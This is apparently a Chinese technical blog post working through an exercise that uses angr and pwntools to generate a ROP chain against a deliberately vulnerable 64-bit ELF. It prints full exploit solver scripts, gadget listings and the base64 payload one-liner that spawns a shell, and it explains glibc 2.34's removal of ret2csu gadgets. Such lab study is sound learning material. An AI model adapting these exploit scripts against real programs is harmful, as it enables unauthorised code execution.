标题: Angr符号执行练习--Automatic Rop Chain Generation 创建: 2025-04-10 11:44 更新: 2025-04-23 12:11 链接: https://scz.617.cn/unix/202504101144.txt -------------------------------------------------------------------------- 目录: ☆ 目标ELF ☆ buffer_overflow_64bit_solver.py ☆ ROP工具 ☆ buffer_overflow_64bit_solver_a.py ☆ 为什么buffer_overflow_64bit_bad不能用于演示 -------------------------------------------------------------------------- ☆ 目标ELF 参看 -------------------------------------------------------------------------- Automatic Rop Chain Generation - [2022-01-16] https://breaking-bits.gitbook.io/breaking-bits/vulnerability-discovery/automatic-exploit-generation/automatic-rop-chain-generation https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/buffer_overflow.c https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/buffer_overflow_64bit https://github.com/ChrisTheCoolHut/Auto_rop_chain_generation/blob/master/auto_rop_chain.py -------------------------------------------------------------------------- 此题作者已提供求解程序,本文只是学习所涉及的技术,无原创内容。 buffer_overflow.c是目标源码,buffer_overflow_64bit是预编译的目标ELF。 -------------------------------------------------------------------------- int pwn_me() { char my_buf[20] = {'\x00'}; printf("Your buffer is at %p\n", my_buf); /* * 栈溢出 */ gets(my_buf); return 0; } void does_nothing() { puts("/bin/sh"); execve(NULL,NULL,NULL); system("sleep 1"); } void main() { puts("pwn_me:"); pwn_me(); } -------------------------------------------------------------------------- $ file -b buffer_overflow_64bit ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ..., not stripped $ rabin2 -I buffer_overflow_64bit canary false // 无"stack canary" injprot false // 据此推断无ASLR linenum true // 包含行号信息 lsyms true // 包含调试符号 nx true // 启用NX位保护,栈区不可执行 relocs true // 包含重定位信息 relro partial // 指Relocation Read-Only部分启用 sanitize false // 编译时未使用AddressSanitizer之类技术 static false // 动态链接 stripped false // 未strip (输出有删减) 本次练习目的是,用angr加pwn自动生成基于ROP的Exploit。 gets()触发栈溢出,栈区不可执行,必须用ROP技术。 does_nothing()是刻意提供给做题者的,贴心地提供了ROP所需的一切元素,可用的 关键函数、关键字符串。若从源码编译生成目标ELF,不要启用优化,否则未用代码 可能被丢弃。即便如此,仍不建议从源码生成ELF,原因后面再说。 ☆ buffer_overflow_64bit_solver.py -------------------------------------------------------------------------- import sys, os, time, base64, logging import angr, claripy import pwn def generate_standard_rop_chain ( binary ) : logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR ) logging.getLogger( 'pwnlib.rop.rop' ).setLevel( logging.ERROR ) pwn.context.clear() pwn.context.arch \ = 'amd64' pwn.context.os = 'linux' pwn.context.binary \ = binary elf = pwn.ELF( binary ) rop = pwn.ROP( elf ) strings = [ b"/bin/sh\0", b"/bin/bash\0" ] functions = [ "system", "execve" ] ret_func = None ret_string = None for function in functions : if function in elf.plt : ret_func = elf.plt[function] break elif function in elf.symbols : ret_func = elf.symbols[function] break if not ret_func : raise RuntimeError( "Cannot find symbol to return to" ) for string in strings : # # elf.search() returns an iterator # str_occurences = list( elf.search( string ) ) if str_occurences : ret_string = str_occurences[0] break if not ret_string : raise RuntimeError( "Cannot find string to pass to system or exec" ) # # On 64-bit Linux (amd64), the system function (often implemented in # libc) might use movaps instructions which require the stack pointer # (rsp) to be 16-byte aligned. Sometimes, the state of the stack just # before calling system via ROP leaves it misaligned (e.g., aligned to # 8 bytes but not 16). Adding a single ret gadget advances the stack # pointer by one word (8 bytes on amd64), potentially fixing this # alignment issue. # # 是否增加这个ret,以实测为准,这不是包打天下的Fix # rop.raw( rop.ret.address ) # # 通常会在栈上生成类似[pop_rdi_ret][ret_string][ret_func]的序列 # rop.call( ret_func, [ret_string] ) # # 0x0000: 0x40101a ret # 0x0008: 0x4012d3 pop rdi; ret # 0x0010: 0x40201a [arg0] rdi = 4202522 // 4202522=0x40201a # 0x0018: 0x401094 # try : print( rop.dump() ) except Exception as e : print( f"Couldn't automatically find a way: {e}", file=sys.stderr ) sys.exit( -1 ) return rop, rop.build() # # 此函数并非通用实现,只适用于"pop|ret"情形 # def do_64bit_rop_with_stepping ( elf, rop, rop_chain, state ) : # # rop_chain是代码地址、数据地址或整数构成的list # # rop.gadgets是所有的gadget,是个字典,key是代码地址 # # print( rop_chain ) # print( rop.gadgets ) curr_rop = None elf_symbol_addrs \ = [y for x, y in elf.symbols.items()] for i, gadget in enumerate( rop_chain ) : # # We generally have two constraining mode # # 1. running a code gadget # 2. setting a register to an expected popped value # # # gadget有可能不是代码地址,而是数据地址或整数 # if gadget in rop.gadgets : curr_rop = rop.gadgets[gadget] # # reversing it lets us pop values out easy # # list用pop()时,从尾部弹,用pop(0)时,从首部弹,但pop(0)性能 # 不好,对大list尤其如此,不建议用pop(0),所以此处先reverse() # curr_rop.regs.reverse() # # Case 1: running a code gadget # # We keep track of the number of registers our gadget popped, and # if it's 0, then we're just executing # if curr_rop is None or gadget in rop.gadgets or len( curr_rop.regs ) == 0 : desire = state.regs.pc == gadget if state.satisfiable( extra_constraints=( desire, ) ) : # # This process is slower than just setting the whole stack # to the chain, but in testing it seems to work more # reliably # print( "Setting PC to {}".format( hex( gadget ) ) ) state.add_constraints( desire ) # # Since we're emulating the program's execution with angr # we will run into an issue when executing any symbols. # Where a SimProcedure will get executed instead of the # real function, which then gives us the wrong constraints # /execution for our rop_chain # if gadget in elf_symbol_addrs : # # item是[symbol,addr] # item = [x for x in elf.symbols.items() if gadget == x[1]][0] print( f"Gadget '{item[0]}' is hooked symbol, contraining to real address, but calling SimProc" ) state.regs.pc = state.project.loader.find_symbol( item[0] ).rebased_addr # # state.regs.pc.concrete_value # state.regs.pc.args[0] # pc = state.regs.pc.concrete_value # # auto_load_libs=False # # Gadget 'system' => 0x500010 # # # auto_load_libs=True # # Gadget 'system' => 0x550d70 # # # $ objdump -p /lib/x86_64-linux-gnu/libc.so.6 | grep -m 1 LOAD | awk -F' ' '{print $5;}' # $ readelf -l /lib/x86_64-linux-gnu/libc.so.6 | grep -m 1 LOAD | awk -F' ' '{print $3;}' # 0x0000000000000000 # # $ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " system@" # 0000000000050d70 W system@@GLIBC_2.2.5 # print( f"Gadget '{item[0]}' => {pc:#x}" ) print( state.project.loader.find_object_containing( pc ) ) if i == len( rop_chain ) - 1 : break sm = state.project.factory.simulation_manager( state ) # # opt_level=0 这是关键。它告诉angr的VEX引擎禁用或减少优化。 # 默认情况下,angr会尝试一次性分析和提升(lift)一个基本块 # (basic block)的VEX IR。对于ROP gadget这种通常很短、以ret # 结尾的代码片段,默认优化可能会导致模拟行为与实际CPU执行 # 不完全一致,或者一次模拟了过多指令。opt_level=0 强制angr # 更接近单步执行,更精确地模拟ROP gadget的效果。 # sm.explore( opt_level=0 ) if sm.unconstrained : state = sm.unconstrained[0] else : print( "sm.unconstrained[] is empty", file=sys.stderr ) sys.exit( -1 ) else : print( "Unsatisfied setting PC to {}".format( hex( gadget ) ), file=sys.stderr ) sys.exit( -1 ) # # Case 2: setting a register to an expected popped value # else : # # pop()从尾部弹,由于事先reverse()过,所以此刻的pop()相当于取 # 代码中正序第一个寄存器 # next_reg = curr_rop.regs.pop() if type( next_reg ) is not str : print( "type( next_reg ) is not str", file=sys.stderr ) sys.exit( -1 ) print( "Setting register {}".format( next_reg ) ) gadget_msg = gadget if isinstance( gadget, int ) : gadget_msg = hex( gadget ) state_reg = getattr( state.regs, next_reg ) desire = state_reg == gadget if state_reg.symbolic and state.satisfiable( extra_constraints=( desire, ) ): print( "Setting register {} to {}".format( next_reg, gadget_msg ) ) state.add_constraints( desire ) else: print( "Unsatisfied on setting {} to {}".format( next_reg, gadget_msg ), file=sys.stderr ) sys.exit( -1 ) if len( curr_rop.regs ) == 0 : curr_rop = None return state def get_input ( state ) : logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR ) copy_state = state.copy() binary = state.project.filename elf = pwn.ELF( binary ) rop, rop_chain \ = generate_standard_rop_chain( binary ) new_state = do_64bit_rop_with_stepping( elf, rop, rop_chain, copy_state ) input = new_state.posix.dumps( sys.stdin.fileno() ) return input def check_mem_corruption ( sm ) : if len( sm.unconstrained ) : for u in sm.unconstrained : desire = u.regs.pc == 0x41414141 if u.satisfiable( extra_constraints=( desire, ) ) : sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) ) # print( sth ) print( "RetAddr offset is {}".format( sth.index( b"AAAA" ) ) ) u.globals["input"] \ = get_input( u ) sm.stashes['found'].append( u ) sm.stashes['unconstrained'].remove( u ) sm.drop( stash='active' ) break return sm def main ( argv ) : logging.getLogger( 'angr.engines.successors' ).setLevel( logging.ERROR ) logging.getLogger( 'angr.procedures.libc.gets' ).setLevel( logging.ERROR ) # # 本例auto_load_libs应该为True,该值默认为True,表示加载依赖库。False # 会导致state.project.loader.find_symbol( item[0] ).rebased_addr解析到 # SimProcedure的跳板地址,位于cle中,而非libc.so.6中;也就是说,此时并 # 未规避自动Hook。原始意图要求检查rop chain时,规避SimProcedure,使用 # libc中地址,故此处不应该用False。 # # 单就本例而言,此处为False仍能得到预期结果。原因是,rop chain只有最后 # 一跳system的rebased_addr被错误解析到SimProcedure的跳板地址,其余跳不 # 涉及SimProcedure,而最后一跳并未交由angr模拟执行,碰巧未触发BUG。 # proj = angr.Project( argv[1], auto_load_libs=True ) magic_size = 128 magic = claripy.BVS( "magic", magic_size * 8 ) init_state = proj.factory.full_init_state( stdin = angr.SimFileStream( name = 'stdin', content = magic, has_end = True ), ) # # 设置angr模拟的libc中,用于标准输入/输出缓冲区的符号字节数限制。angr # 在处理标准输入输出时,为了性能考虑,可能不会让整个流都是符号化的。这 # 个选项告诉angr,对于stdin/stdout/stderr,最多将前多少字节视为符号化 # 的。如果程序读取超过这个数量的数据,angr可能会选择将后续读取的数据具 # 体化(变成某个具体值),或者采取其他策略。设置一个足够大的值,有助于确 # 保我们的符号输入magic能够覆盖到需要溢出的缓冲区。 # # 本例比较特殊,实测表明,不设也可以,但建议设置 # # 默认是60 # init_state.libc.buf_symbolic_bytes \ = magic_size sm = proj.factory.simulation_manager( init_state, save_unconstrained = True, stashes = { 'active' : [init_state], 'unconstrained' : [], 'found' : [], } ) sm.explore( step_func=check_mem_corruption ) if not sm.found : return raw = sm.found[0].globals["input"] somefile = '/tmp/some.bin' with open( somefile, "wb" ) as f : f.write( raw ) print( "cat {} - | ./{}".format( somefile, argv[1] ) ) solution = base64.b64encode( raw ).decode( 'utf-8' ) print( '(echo -ne "%s" | base64 -d;cat -) | ./%s' % ( solution, argv[1] ) ) if "__main__" == __name__ : start = time.time() main( sys.argv ) end = time.time() print( "Time elapsed: {}".format( end - start ) ) -------------------------------------------------------------------------- 上例auto_load_libs应该为True,之前错误设置为False,但因其他原因未触发BUG; 已由bluerust指正后修改,具体细节参看相应注释。 说一下总体思路。靠check_mem_corruption()找到RetAddr可控的状态。靠get_input 获取用于栈溢出的input。靠generate_standard_rop_chain()获取rop chain,这步 与angr无关,只与pwn模块有关;某种意义上"Auto ROP Generation"是个噱头,让人 误以为是angr找到的rop chain。靠do_64bit_rop_with_stepping()约束求解,确保 rop chain得到执行。 rop.gadgets[addr].regs[]是个list,元素可能是这段gadget所修改的寄存器名,也 可能是个整数。观察rop.gadgets { 4198423: Gadget(0x401017, ['add esp, 8', 'ret'], [8], 0x10), 4198422: Gadget(0x401016, ['add rsp, 8', 'ret'], [8], 0x10), 4198919: Gadget(0x401207, ['leave', 'ret'], ['rbp', 'rsp'], 0x2540be407), 4199116: Gadget(0x4012cc, ['pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['r12', 'r13', 'r14', 'r15'], 0x28), 4199118: Gadget(0x4012ce, ['pop r13', 'pop r14', 'pop r15', 'ret'], ['r13', 'r14', 'r15'], 0x20), 4199120: Gadget(0x4012d0, ['pop r14', 'pop r15', 'ret'], ['r14', 'r15'], 0x18), 4199122: Gadget(0x4012d2, ['pop r15', 'ret'], ['r15'], 0x10), 4199115: Gadget(0x4012cb, ['pop rbp', 'pop r12', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r12', 'r13', 'r14', 'r15'], 0x30), 4199119: Gadget(0x4012cf, ['pop rbp', 'pop r14', 'pop r15', 'ret'], ['rbp', 'r14', 'r15'], 0x20), 4198813: Gadget(0x40119d, ['pop rbp', 'ret'], ['rbp'], 0x10), 4199123: Gadget(0x4012d3, ['pop rdi', 'ret'], ['rdi'], 0x10), 4199121: Gadget(0x4012d1, ['pop rsi', 'pop r15', 'ret'], ['rsi', 'r15'], 0x18), 4199117: Gadget(0x4012cd, ['pop rsp', 'pop r13', 'pop r14', 'pop r15', 'ret'], ['rsp', 'r13', 'r14', 'r15'], 0x28), 4198426: Gadget(0x40101a, ['ret'], [], 0x8) } Gadget()的第3列(从1计)即regs[],大多数时候是一系列寄存器名,有时是[8]这种, 有时是[]。很容易辨别出regs[]的含义,处理regs[]要考虑这些可能性。 $ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit 正常的话,可能输出 RetAddr offset is 40 0x0000: 0x40101a ret 0x0008: 0x4012d3 pop rdi; ret 0x0010: 0x40201a [arg0] rdi = 4202522 0x0018: 0x401094 Setting PC to 0x40101a Setting PC to 0x4012d3 Setting register rdi Setting register rdi to 0x40201a Setting PC to 0x401094 Gadget 'system' is hooked symbol, contraining to real address, but calling SimProc Gadget 'system' => 0x550d70 cat /tmp/some.bin - | ./buffer_overflow_64bit (echo -ne "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABoQQAAAAAAA0xJAAAAAAAAaIEAAAAAAAJQQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" | base64 -d;cat -) | ./buffer_overflow_64bit ☆ ROP工具 参看 -------------------------------------------------------------------------- https://docs.pwntools.com/en/stable/rop/rop.html ROPgadget Tool https://github.com/JonathanSalwan/ROPgadget Ropper https://github.com/sashs/Ropper -------------------------------------------------------------------------- pip3 install ROPgadget ropper pip3 show ROPgadget ropper ROPgadget.py如下 -------------------------------------------------------------------------- import ropgadget ropgadget.main() -------------------------------------------------------------------------- python3 ROPgadget.py --help python3 ROPgadget.py --binary buffer_overflow_64bit --only "pop|ret" python3 ROPgadget.py --binary buffer_overflow_64bit --ropchain Ropper.py如下 -------------------------------------------------------------------------- import sys sys.path.append("filebytes") import ropper ropper.start(sys.argv[1:]) -------------------------------------------------------------------------- python3 Ropper.py -h python3 Ropper.py -f buffer_overflow_64bit --search "pop rdi" python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret" python3 Ropper.py -f buffer_overflow_64bit --search "pop r??; ret" --detail 指定--detail时,每行对应一条指令,否则所有指令以分号为分隔符显示在一行 python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]" python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3 python3 Ropper.py -f buffer_overflow_64bit --search "mov rax, [%]; %; call rax" --quality 3 --detail quality为1表示最好,但可能无解,为10表示最差,可能有多解 ☆ buffer_overflow_64bit_solver_a.py 可在栈上直接放置rop chain,更简洁。原注释中说,用angr模拟执行rop chain更可 靠,这才使用复杂的do_64bit_rop_with_stepping(),单就本例而言,无此必要。下 例修改两个函数,并删掉do_64bit_rop_with_stepping()。 -------------------------------------------------------------------------- def get_input ( state, prefix ) : logging.getLogger( 'pwnlib.elf.elf' ).setLevel( logging.ERROR ) binary = state.project.filename elf = pwn.ELF( binary ) rop, rop_chain \ = generate_standard_rop_chain( binary ) input = prefix # # 在栈上直接放置rop chain # for item in rop_chain : if not isinstance( item, int ) : raise TypeError( f"ROP chain item is not an integer: {item} ({type(item)})" ) # # Pack the 64-bit integer into 8 bytes, little-endian # item = item.to_bytes( 8, byteorder='little', signed=False ) input += item return input def check_mem_corruption ( sm ) : if len( sm.unconstrained ) : for u in sm.unconstrained : desire = u.regs.pc == 0x41414141 if u.satisfiable( extra_constraints=( desire, ) ) : sth = u.posix.dumps( sys.stdin.fileno(), extra_constraints=( desire, ) ) off = sth.index( b"AAAA" ) print( "RetAddr offset is {}".format( off ) ) sth = sth[0:off] u.globals["input"] \ = get_input( u, sth ) sm.stashes['found'].append( u ) sm.stashes['unconstrained'].remove( u ) sm.drop( stash='active' ) break return sm -------------------------------------------------------------------------- ☆ 为什么buffer_overflow_64bit_bad不能用于演示 从源码生成buffer_overflow_64bit_bad gcc-11 -fno-stack-protector \ -Wno-implicit-function-declaration -Wno-format-security \ -no-pie -z relro buffer_overflow.c -o buffer_overflow_64bit_bad 有个警告 /usr/bin/ld: /tmp/cca0Wjc7.o: in function `pwn_me': buffer_overflow.c:(.text+0x4b): warning: the `gets' function is dangerous and should not be used. 此警告来自ld,无法通过gcc编译选项予以消除,意思是gets()是危险函数。 在buffer_overflow_64bit中寻找rop chain时,需要找"pop rdi; ret"。确实找到了, 在0x4012d3,这是__libc_csu_init()中一段代码。本来是"pop r15",但从中间执行 时,可以解释成"pop rdi"。 -------------------------------------------------------------------------- gdb -q -nx --args ./buffer_overflow_64bit anything starti (gdb) x/2i 0x4012d3 0x4012d3 <__libc_csu_init+99>: pop %rdi 0x4012d4 <__libc_csu_init+100>: ret (gdb) x/2bx 0x4012d3 0x4012d3 <__libc_csu_init+99>: 0x5f 0xc3 -------------------------------------------------------------------------- /* * buffer_overflow_64bit */ 00000000004010D0 _start ... 00000000004010E3 49 C7 C0 E0 12 40 00 mov r8, offset __libc_csu_fini ; fini 00000000004010EA 48 C7 C1 70 12 40 00 mov rcx, offset __libc_csu_init ; init 00000000004010F1 48 C7 C7 45 12 40 00 mov rdi, offset main ; main 00000000004010F8 FF 15 F2 2E 00 00 call cs:__libc_start_main_ptr 00000000004010FE F4 hlt -------------------------------------------------------------------------- 0000000000401270 __libc_csu_init ... /* * rop chain */ 00000000004012D2 41 5F pop r15 00000000004012D4 C3 retn -------------------------------------------------------------------------- 但用gcc 11.3.0编译得到的buffer_overflow_64bit_bad,找不到"pop rdi; ret"。 原因是,bad版本的fini、init初始化成NULL,ELF中没有__libc_csu_init()的代码。 偏偏只有_libc_csu_init()中有"pop rdi; ret",且未找到其他达成同一目的的rop chain,用多种ROP工具均未找到替代方案。 -------------------------------------------------------------------------- /* * buffer_overflow_64bit_bad */ 00000000004010D0 _start ... /* * 初始化成NULL */ 00000000004010E3 45 31 C0 xor r8d, r8d ; fini 00000000004010E6 31 C9 xor ecx, ecx ; init 00000000004010E8 48 C7 C7 4E 12 40 00 mov rdi, offset main ; main 00000000004010EF FF 15 FB 2E 00 00 call cs:__libc_start_main_ptr 00000000004010F5 F4 hlt -------------------------------------------------------------------------- $ python3 buffer_overflow_64bit_solver.py buffer_overflow_64bit_bad RetAddr offset is 40 [ERROR] Could not satisfy setRegisters({'rdi': 4202522}) ERROR | 2025-04-09 22:23:10,945 | pwnlib.rop.rop | Could not satisfy setRegisters({'rdi': 4202522}) Couldn't automatically find a way: Could not satisfy setRegisters({'rdi': 4202522}) 暂时不知如何调整gcc编译选项,使得init初始化成__libc_csu_init。 小侯看到此处时,说这事与gcc版本无关,与glibc版本相关,是2.34引入的安全升级 所致,定向针对ret2csu技术。 如下命令可查看当前glibc版本,但第一个并不可靠,推荐后两个 ldd --version /lib/x86_64-linux-gnu/libc.so.6 $(ldd /bin/ls | cut -d' ' -f3 | grep libc.so.) 本文测试环境glibc版本2.35 参看 《在github上查看Fastjson不同版本之间变化》 https://scz.617.cn/web/202007241343.txt 只说浏览器模式下远程查看github项目,一般模式: https://github.com/{user}/{repository}/releases/tag/{until-tag} https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag} https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag}.diff https://github.com/{user}/{repository}/compare/{from-tag}...{until-tag}.patch 比如: https://github.com/bminor/glibc/releases/tag/glibc-2.33 https://github.com/bminor/glibc/releases/tag/glibc-2.34 https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34 https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34.diff https://github.com/bminor/glibc/compare/glibc-2.33...glibc-2.34.patch 点击"Commits",搜: Reduce the statically linked startup code 点击"Files changed",搜: libc-start.c "Commits"、"Files changed"数量太大,若要找的项不在前几页,很难有耐心一页页 翻找。访问 https://github.com/bminor/glibc/blob/glibc-2.34/csu/libc-start.c 点击"Blame",搜"call_init",命中后左侧有 https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668 https://github.com/bminor/glibc/blame/a79328c745219dcb395070cdcd3be065a8347f24/csu/libc-start.c 第一个是2.34前后发生的变化,通过第二个找再之前发生的变化。本节只关心第一个, 搜"libc-start.c",命中后点击之,得到 https://github.com/bminor/glibc/commit/035c012e32c11e84d64905efaf55e74f704d3668#diff-d8c51a7b495ae610b2fe2f3ef10828d09c3c99718a32d6c50eb8b4e4159ca7e9 这是2.34前后libc-start.c发生的变化。 这个commit是2021.2.25提交的,有如下信息: -------------------------------------------------------------------------- It turns out the startup code in csu/elf-init.c has a perfect pair of ROP gadgets (see Marco-Gisbert and Ripoll-Ripoll, "return-to-csu: A New Method to Bypass 64-bit Linux ASLR"). These functions are not needed in dynamically-linked binaries because DT_INIT/DT_INIT_ARRAY are already processed by the dynamic linker. However, the dynamic linker skipped the main program for some reason. For maximum backwards compatibility, this is not changed, and instead, the main map is consulted from __libc_start_main if the init function argument is a NULL pointer. For statically linked binaries, the old approach based on linker symbols is still used because there is nothing else available. A new symbol version __libc_start_main@@GLIBC_2.34 is introduced because new binaries running on an old libc would not run their ELF constructors, leading to difficult-to-debug issues. -------------------------------------------------------------------------- 2.34之前有"csu/elf-init.c",其中有__libc_csu_init(),会调用init_array[]。 2.34删除elf-init.c,也就删除了__libc_csu_init()等函数。 2.34的"csu/libc-start.c"中有call_init(),会调用init_array[]。 __libc_csu_init()位于main()所在ELF中,call_init()位于ld-linux-x86-64.so.2 (动态链接器)中,ASLR对后者影响更大。 -------------------------------------------------------------------------- gdb -q -nx --args ./buffer_overflow_64bit anything starti (gdb) x/i __libc_csu_init 0x401270 <__libc_csu_init>: endbr64 (gdb) | info proc mappings | grep buffer_overflow_64bit | grep 'r-xp' 0x401000 0x402000 0x1000 0x1000 r-xp /tmp/buffer_overflow_64bit (gdb) info symbol 0x401270 __libc_csu_init in section .text of /tmp/buffer_overflow_64bit -------------------------------------------------------------------------- gdb -q -nx --args ./buffer_overflow_64bit_bad anything starti (gdb) x/i call_init 0x7ffff7fc93e0 : push %r14 (gdb) | info proc mappings | grep ld-linux | grep 'r-xp' 0x7ffff7fc5000 0x7ffff7fef000 0x2a000 0x2000 r-xp /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 (gdb) info symbol 0x7ffff7fc93e0 call_init.part in section .text of /lib64/ld-linux-x86-64.so.2 -------------------------------------------------------------------------- CTF选手应该一眼熟,我没打过CTF,对这些细微变化不甚了解。